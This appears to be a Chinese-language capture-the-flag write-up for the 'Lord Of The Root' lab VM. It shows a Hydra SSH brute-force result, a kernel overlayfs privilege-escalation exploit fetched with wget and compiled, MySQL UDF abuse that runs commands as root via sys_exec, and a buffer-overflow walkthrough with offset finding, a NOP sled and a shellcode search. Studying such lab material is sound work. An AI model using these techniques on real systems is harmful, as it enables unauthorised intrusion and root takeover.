[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:5/p:6), ~2 tries per task
[DATA] attacking ssh://192.168.116.196:22/
[22][ssh] host: 192.168.116.196 login: smeagol password: MyPreciousR00t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-13 22:44:19


MSF


内核提权

常规信息收集,内核是3.19.0-25,这个是有直接内核权限提升的

[email protected]:~$ id
uid=1000(smeagol) gid=1000(smeagol) groups=1000(smeagol)
[email protected]:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 athlon i686 GNU/Linux
[email protected]:~$ hostnamectl
Static hostname: LordOfTheRoot
Icon name: computer-vm
Chassis: vm
Boot ID: 5b76adc7b3ac43a7905747d9d010c81b
Operating System: Ubuntu 14.04.3 LTS
Kernel: Linux 3.19.0-25-generic
Architecture: i686
[email protected]:~$

先上漏洞平台搜索Ubuntu 14.04.3 exploit,如果有的话,就到本地漏洞库 copy

└─# searchsploit 39166            
---------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1) | linux/local/39166.c
---------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# searchsploit -m linux/local/39166.c
Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/39166
Path: /usr/share/exploitdb/exploits/linux/local/39166.c
File Type: C source, ASCII text

Copied to: /root/桌面/demo/Lord_Of_The_Root-1.0.1/39166.c

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# ls
39166.c p.txt u.txt

这里默认编译

[email protected]:/tmp$ wget http://192.168.116.164/39166.c
--2022-11-13 08:11:20-- http://192.168.116.164/39166.c
Connecting to 192.168.116.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2680 (2.6K) [text/x-csrc]
Saving to: ‘39166.c’

100%[==================================================================================================>] 2,680 --.-K/s in 0s

2022-11-13 08:11:20 (238 MB/s) - ‘39166.c’ saved [2680/2680]

[email protected]:/tmp$ ls
39166.c
[email protected]:/tmp$ which gcc
/usr/bin/gcc
[email protected]:/tmp$ gcc 39166.c -o demo && chmod +x demo
[email protected]:/tmp$ ./demo
[email protected]:/tmp# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
[email protected]:/tmp#


UDF

这里我们看/usr/sbin/mysqld是 root 权限执行的即可

[email protected]:/tmp$ ps aux | grep mysql
root 1182 0.0 4.2 327200 43444 ? Ssl 06:28 0:02 /usr/sbin/mysqld
smeagol 3766 0.0 0.1 4692 2048 pts/1 S+ 08:14 0:00 grep --color=auto mysql

dpkg这个是 Ubuntu 管理软件包的,可以发现他是 version-5.5.44 的

[email protected]:/tmp$ dpkg -l | grep mysql
ii libdbd-mysql-perl 4.025-1 i386 Perl5 database interface to the MySQL database
ii libmysqlclient18:i386 5.5.44-0ubuntu0.14.04.1 i386 MySQL database client library
ii mysql-client-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database client binaries
ii mysql-client-core-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database core client binaries
ii mysql-common 5.5.44-0ubuntu0.14.04.1 all MySQL database common files, e.g. /etc/mysql/my.cnf
ii mysql-server 5.5.44-0ubuntu0.14.04.1 all MySQL database server (metapackage depending on the latest version)
ii mysql-server-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database server binaries and system database setup
ii mysql-server-core-5.5 5.5.44-0ubuntu0.14.04.1 i386 MySQL database server binaries
ii php5-mysql 5.5.9+dfsg-1ubuntu4.11 i386 MySQL module for php5
rc php5-mysqlnd 5.5.9+dfsg-1ubuntu4.11 i386 MySQL module for php5 (Native Driver)
[email protected]:/tmp$

有戏就直接奔到配置文件查找账号密码cat * | grep -i -R "pass"

[email protected]:/var/www/978345210$ cat * | grep -i -R "pass"
index.php:<label>Password :</label>
index.php:<input id="password" name="password" placeholder="**********" type="password">
login.php: if (empty($_POST['username']) || empty($_POST['password'])) {
login.php: $error = "Username or Password is invalid";
login.php: // Define $username and $password
login.php: $password=$_POST['password'];
login.php: $password = stripslashes($password);
login.php: $sql="select username, password from Users where username='".$username."' AND password='".$password."';";

$db = new mysqli('localhost', 'root', 'darkshadow', 'Webapp');这里拿到数据就进行登录

[email protected]:/var/www/978345210$ mysql -uroot -pdarkshadow
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1392
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


检查是否满足条件

  • secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入导出,此时无法提权

  • secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下,此时也无法提权

  • 当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入、导出做限制,此时可提权!

  • 如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数

这里的条件是可以任意位置提权,但是我们也只有/tmp才有权限,secure_file_priv为空而不是NULL

mysql> show global variables like 'secure%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
2 rows in set (0.00 sec)

mysql> show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value |
+---------------+------------------------+
| plugin_dir | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select user,host from user;
+------------------+---------------+
| user | host |
+------------------+---------------+
| root | 127.0.0.1 |
| root | ::1 |
| debian-sys-maint | localhost |
| root | localhost |
| root | lordoftheroot |
+------------------+---------------+
5 rows in set (0.00 sec)

select * from mysql.user where user = substring_index(user(),'@',1)\G;

substring_index(“待截取有用部分的字符串”,“截取数据依据的字符”,截取字符的位置N)

select @@basedir from dual;
show variables like '%compile%';

补充知识点

MySQL中,BLOB 是一个二进制大型对象,是一个可以存储大量数据的容器,它能容纳不同大小的数据。BLOB类型实际是个类型系列(TinyBlob、Blob、MediumBlob、LongBlob),除了在存储的最大信息量上不同外,他们是等同的

MySQL 的四种 BLOB 类型

类型

大小(单位:字节)

TinyBlob

最大 255

Blob

最大 65K

MediumBlob

最大 16M

LongBlob

最大 4G

我们调用的命令执行都是由lib_mysqludf_sys函数进行提供的

  • sys_eval,执行任意命令,并将输出返回

  • sys_exec,执行任意命令,并将退出码返回

  • sys_get,获取一个环境变量

  • sys_set,创建或修改一个环境变量

EXP 的存放路径,需要区分好框架

/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll

创建函数

这里的靶机是 32 位的 linux,保存好就下载到靶机的目录下

cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so aa.so
022-11-13 09:09:17--  http://192.168.116.164/aa.so
Connecting to 192.168.116.164:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5696 (5.6K) [application/octet-stream]
Saving to: ‘aa.so’

100%[=======================================================================================================>] 5,696 --.-K/s in 0s

2022-11-13 09:09:17 (780 MB/s) - ‘aa.so’ saved [5696/5696]

[email protected]:/tmp$ ls
39166.c aa.so demo
[email protected]:/tmp$

mysql> use mysql
Database changed
mysql> create table aa( aa longblob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into aa values (load_file('/tmp/ aa.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from aa into dumpfile '/usr/lib/mysql/plugin/ aa.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function sys_exec returns string soname 'aa.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+----------+-----+-------+----------+
| name | ret | dl | type |
+----------+-----+-------+----------+
| sys_exec | 0 | aa.so | function |
+----------+-----+-------+----------+
1 row in set (0.00 sec)

mysql> select sys_exec('whoami');
+--------------------+
| sys_exec('whoami') |
+--------------------+
| NULL |
+--------------------+
1 row in set (0.00 sec)

mysql> select sys_exec('chmod u+s /usr/bin/find');
+-------------------------------------+
| sys_exec('chmod u+s /usr/bin/find') |
+-------------------------------------+
| NULL |
+-------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
[email protected]:/tmp$ find / -exec '/bin/sh' \;
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)


痕迹清理

drop table {tables};

drop function {mysql.func_函数};


在 windows 中 上传 dLL mysql 是支持网络路径的

select load _file('\\\\127.0.0.1\\xxx\\lib_mysqludf sys_64.dll') into dumpfile "F:\\xxxx\\mysql-5.7.26\\lib\\plugin\\lib_mysqludf_sys_64.dll";

缓冲区

SUID 的权限查看,查看权限有问题的文件 door1~door3,这些文件是很吸引眼球的

# find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 5150 Sep 22 2015 /root/buf
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /root/other
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 35300 Jul 15 2015 /bin/su
-rwsr-xr-x 1 root root 88752 Aug 4 2015 /bin/mount
-rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 67704 Aug 4 2015 /bin/umount
-rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 5150 Sep 22 2015 /SECRET/door2/file
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /SECRET/door1/file
-rwsr-xr-x 1 root root 7370 Sep 17 2015 /SECRET/door3/file
-rwsr-xr-x 1 root root 18168 Mar 4 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 45420 Jul 15 2015 /usr/bin/passwd
-rwsr-xr-x 1 root root 35916 Jul 15 2015 /usr/bin/chsh
-rwsr-xr-x 1 root root 44620 Jul 15 2015 /usr/bin/chfn
-rwsr-xr-x 1 root root 66252 Jul 15 2015 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 30984 Jul 15 2015 /usr/bin/newgrp
-rwsr-xr-x 1 root lpadmin 13672 Jun 4 2015 /usr/bin/lppasswd
-rwsr-xr-x 1 root root 18136 May 7 2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 158404 Jan 6 2014 /usr/bin/find
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-xr-x 1 root root 156708 Mar 12 2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 9612 Feb 25 2015 /usr/lib/pt_chown
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd

/root的目录下有几个文件,源文件和编译好的文件

#cd /root
# ls
buf buf.c Flag.txt other other.c switcher.py

这里解剖一下他的源码,switcher.py这个文件就是产生随机值,根据luckyDoor的随机值

# cat switcher.py
#!/usr/bin/python
import os
from random import randint

targets= ["/SECRET/door1/","/SECRET/door2/","/SECRET/door3/"]
for t in targets:
os.system("rm "+t+"*")
os.system("cp -p other "+t)
os.system("cp -p "+t+"other "+t+"file")
os.system("rm "+t+"other")

luckyDoor = randint(0,2)
t=targets[luckyDoor]
os.system("rm "+t+"*")
os.system("cp -p buf "+t)
os.system("cp -p "+t+"buf "+t+"file")
os.system("rm "+t+"buf")


漏洞分析

这里注意观察一下strcpy, 数在执行字符串拷贝的过程中没有对字符串进行长度检查,这样就发生超长的字符串溢出缓冲区的情况

char *strcpy(char *dest, const char *src)
  • dest -- 指向用于存储复制内容的目标数组。

  • src -- 要复制的字符串

当前源码将argv接收的参数 copy 给 buff的内存空间只开启了 159 空间大小,超过就会参数缓冲区漏洞

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]){

char buff[159];
if(argc <2){
printf("Syntax: %s <input string>\n", argv[0]);
exit (0);

}
strcpy(buff, argv[1]);
return 0;

}

这里就是直接 return,没有进行其他的操作

#include <string.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]){

char buff[150];
if(argc <2){
printf("Syntax: %s <input string>\n", argv[0]);
exit (0);

}
//This Program does nothing
return 0;

}


调试

假设我们做了一个应用,我们要与这个应用交互,并向他里面输入指令,本来这个功能只要输入最多20个字母就够了,所以我们就把存放用户输入数据的空间大小设置成了20,但是某些人不老实,往里面输入了24个字母,这下存放数据的空间满了,剩下四个还要放,这四个字母干脆把寄存器 eip 里面的内容给占了(你要知道,缓冲区如果满了,第一时间被覆盖的就是 EIP ),EIP 中本来存放的是下一条需要执行的命令在系统中的地址,现在我们可以通过更改那 24 个字母中最后四个字母来更改EIP地址那是不是我们就能控制下一次执行什么命令了,那我们如果往里面填写 2400 个字符这下除了EIP被覆盖其他的很多数据也被覆盖了,我们是不是可以把这 2400 个字符中的一部分改成我们的恶意代码,当我们把带着恶意代码的2400个字符传给应用,然后找到我们恶意代码的存放位置并且控制 EIP 跳到这个位置,那是不是我们的恶意代码就被执行了(如果没做任何缓冲区溢出防护,那我们每次传送这2400个字符,这些字符在系统中的位置都是固定的,这也是为什么我们能精准确定我们 shellcode在系统中的位置)

为了防止缓冲区溢出,windows和linux也都做了一些防护,比如这个靶场中出现的ASLR:

  1. 一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的

  2. 这个技术就是为了让我们无法预测我们恶意代码存放的位置,那我们就没办法执行我们的恶意代码了

  3. 至于怎么绕过,我们需要以暴制暴,下面会有具体方法

  4. 存在缓冲区溢出漏洞的文件在根目录下的SECRET中,先看一下他们的文件信息,以下 2 种都可以查看

    1. 查看 ASLR

    1. cat /proc/sys/kernel/randomize_va_space(2)

    2. sysctl -a --pattern randomize(2)

    1. 配置选项

    1. 0 = 关闭

    2. 1 = 半随机,共享库、栈、mmap() 以及 VDSO 将被随机化(留坑,PIE 会影响heap的随机化。。)

    3. 2 = 全随机,除了1中所述,还有heap

    1. 查看空间地址的随机性ldd {file},这里多次对比是不一样的

Linux下关闭ASLR(地址空间随机化)的方法_counsellor的博客-CSDN博客_关闭地址随机化.pdf

上面我们已经解释的非常的清楚为什么,会产生该漏洞,和他的随机产生是怎么实现的,这里我们就需要对比一下 3 个文件的大小或者他的 MD5 值

[email protected]:/SECRET$ ll -alhR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ./
drwxr-xr-x 23 root root 4.0K Sep 22 2015 ../
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 door1/
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 door2/
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 door3/

./door1:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 ./
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ../
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file*

./door2:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 ./
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ../
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file*

./door3:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 09:57 ./
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ../
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 file*

这里可以发现到./door3下面的是明显不一样的,这里我们就 copy 走他的文件,进行样本的分析,使用 base64 进行复制文件,然后重新解密

base64 file    ----将file二进制文件转换base
然后复制到文本中:base64.txt
cat base64.txt | base64 -d > file ---将文本文件转换回可执行文件

这里对比一下 MD5 值 可以发现是一样的,这样我们就保证了文件的完整性,就可以在本地进行分析

[email protected]:/SECRET/door3$ md5sum file 
bb0e0e4439b5039e71405f8a1b6d5c0c file

─# md5sum flie
bb0e0e4439b5039e71405f8a1b6d5c0c flie

这里是到 171 产生报错点,这里就是边界点的位置,下面就是需要去定位他的内存地址

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# ./file $(python2 -c 'print "A"*170')

┌──(root㉿Tom)-[~/桌面/demo/Lord_Of_The_Root-1.0.1]
└─# ./file $(python2 -c 'print "A"*171')

zsh: segmentation fault ./file $(python2 -c 'print "A"*171')


溢出

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000定位

上面我们已经知道报错的产生地点,这里我们就使用填充符号,进行定位 EIP 的内存地址,进一步的精准的去控制我们的 shellcode

└─# gdb -q file
Reading symbols from file...
(No debugging symbols found in file)
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()

这里定位偏移量的同时,也是提示 171 我们的边界点

└─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41376641
[*] Exact match at offset 171

这里就就使用边界点的后 4 位进行定位, EIP 的位置

(gdb) run $(python2 -c 'print "A" * 171 + "B" * 4')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file $(python2 -c 'print "A" * 171 + "B" * 4')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()


ASLR

这里还有一种方法就是,填充堆栈查看稳定的溢出点(类似于爆破,也就是 FUZZ),这个是测试 ASLR 的随机,绕过的方法就是滑动nop和 碰撞

[email protected]:/SECRET/door2$ ldd file 
linux-gate.so.1 => (0xb77b3000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ec000)
/lib/ld-linux.so.2 (0xb77b5000)
[email protected]:/SECRET/door2$ ldd file
linux-gate.so.1 => (0xb76ec000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7525000)
/lib/ld-linux.so.2 (0xb76ee000)
[email protected]:/SECRET/door2$ ldd file
linux-gate.so.1 => (0xb771f000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7558000)

Nop简介:

一种技术是在漏洞利用代码的开头使用一长串NOP(无操作)指令,这只会增加程序计数器。那么攻击者只需要猜测许多NOP指令中的任何一条的地址,而不必猜测漏洞利用代码开始的确切地址。这被称为“ NOP sled”,因为一旦程序跳转到这些NOP指令之一,它就会滑过其余的NOP,直到实际开始利用代码。例如,莫里斯蠕虫以 400 条NOP指令开始。

以前学的缓冲区溢出没有告诉我为什么要使用填充,直到打了这台靶机才发现,缓冲区的保护机制,这里爆破出来的地址是0xffffc860这是 nop sled 的地址开始处(EIP 访问 ESP 的堆栈),当ESP指向该地址处后,就会执行栈堆空间的 payload 获得shell,那么接下来就是要爆破 nop sled 被访问

(gdb) run $(python2 -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file $(python2 -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info r
eax 0x0 0
ecx 0xffffd370 -11408
edx 0xffffd021 -12255
ebx 0xf7fa1ff4 -134602764
esp 0xffffc860 0xffffc860
ebp 0x41414141 0x41414141
esi 0xffffc914 -14060
edi 0xf7ffcb80 -134231168
eip 0x42424242 0x42424242
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) x/s $esp
0xffffc860: '\220' <repeats 200 times>...

这里的查找一下 paylaod shellcode search exec,需要挂互联网shellcode display 841本来是查看这个编号的源码的,这里没有访问成功

gdb-peda$ peda help shellcode 
Generate or download common shellcodes.
Usage:
shellcode generate [arch/]platform type [port] [host]
shellcode search keyword (use % for any character wildcard)
shellcode display shellcodeId (shellcodeId as appears in search results)
shellcode zsc [generate customize shellcode]

For generate option:
default port for bindport shellcode: 16706 (0x4142)
default host/port for connect back shellcode: 127.127.127.127/16706
supported arch: x86

gdb-peda$ shellcode search exec
Connecting to shell-storm.org...
Found 170 shellcodes
ScId Title
[132] Aix - execve /bin/sh - 88 bytes
[136] Alpha - execve() - 112 bytes
[107] BSD/ppc - execve(/bin/sh) - 128 bytes
[814] BSD/x86 - setreuid(geteuid(), geteuid()) and execve(/bin/sh, /bin/sh, 0)
[95] BSD/x86 - setuid/execve - 30 bytes
[92] BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
[362] BSD/x86 - execve /bin/sh Crypt /bin/sh - 49 bytes
[93] BSD/x86 - execve(/bin/sh) - 27 bytes
[131] Sco/x86 - execve(/bin/sh, ..., NULL) - 43 bytes
[866] FreeBSD/x86-64 - execve - 28 bytes
[106] FreeBSD/x86-64 - exec(/bin/sh) Shellcode - 31 bytes
[104] FreeBSD/x86-64 - execve /bin/sh shellcode 34 bytes
[103] FreeBSD/x86-64 - Execve /bin/sh - Anti-Debugging
[100] FreeBSD/x86 - execve /tmp/sh - 34 bytes
[170] FreeBSD/x86 - execve /bin/sh 23 bytes
[749] FreeBSD/x86 - execv(/bin/sh) - 23 bytes
[171] FreeBSD/x86 - execve /bin/sh 37 bytes
[99] FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
[167] FreeBSD/x86 - reverse connect dl(shellcode) and execute, exit - 90 bytes
[97] FreeBSD/x86 - setuid(0)&execve({//sbin/ipf,-Faa,0},0); - 57 bytes
[96] FreeBSD/x86 - setreuid(0, 0) & execve(pfctl -d) - 56 bytes
[133] Hp-Ux - execve(/bin/sh) - 58 bytes
[139] Irix - execve(/bin/sh -c) - 72 bytes
[141] Irix - execve(/bin/sh) - 43 bytes
[140] Irix - execve(/bin/sh) - 68 bytes
--More--(25/170)
[904] Linux/ARM - execve("/bin/sh", NULL, 0) - 34 bytes
[855] Linux/ARM - execve("/bin/sh", [], [0 vars]) - 35 bytes
[671] Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR - 78 bytes
[665] Linux/ARM - execve(/bin/sh, /bin/sh, 0) - 30 bytes
[698] Linux/ARM - execve(/bin/sh, [0], [0 vars]) - 27 bytes
[696] Linux/ARM - execve(/bin/sh,NULL,0) - 31 bytes
[666] Linux/ARM - setuid(0) & execve(/bin/sh, /bin/sh, 0) - 38 bytes
[819] Linux/ARM - execve(/bin/sh, [0], [0 vars]) - 30 bytes
[659] Linux/StrongARM - execve() - 47 bytes
[771] Linux/SuperH - sh4 execve(/bin/sh, 0, 0) - 19 bytes
[787] Linux/SuperH - sh4 - setuid(0) ; execve(/bin/sh, NULL, NULL) - 27 bytes
[79] Linux/mips - execve(/bin/sh) - 56 bytes
[782] Linux/mips - execve(/bin/sh, */bin/sh, 0) - 52 bytes
[792] Linux/mips - execve /bin/sh - 48 bytes
[80] Linux/mips - execve(/bin/sh,[/bin/sh],[]); - 60 bytes
[87] Linux/ppc - connect back execve /bin/sh - 240 bytes
[86] Linux/ppc - execve /bin/sh - 60 bytes
[88] Linux/ppc - read & exec shellcode - 32 bytes
[89] Linux/ppc - execve /bin/sh - 112 bytes
[83] Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes
[82] Linux/sparc - setreuid(0,0)&standard execve() - 72 bytes
[908] Linux/RISC-V64 - execve(/bin/sh, NULL, 0) - 34 bytes
[905] Linux/x86-64 - execveat("/bin//sh") - 29 bytes
[683] Linux/x86-64 - execve(/sbin/iptables, [/sbin/iptables, -F], NULL) - 49 bytes
[806] Linux/x86-64 - Execute /bin/sh - 27 bytes
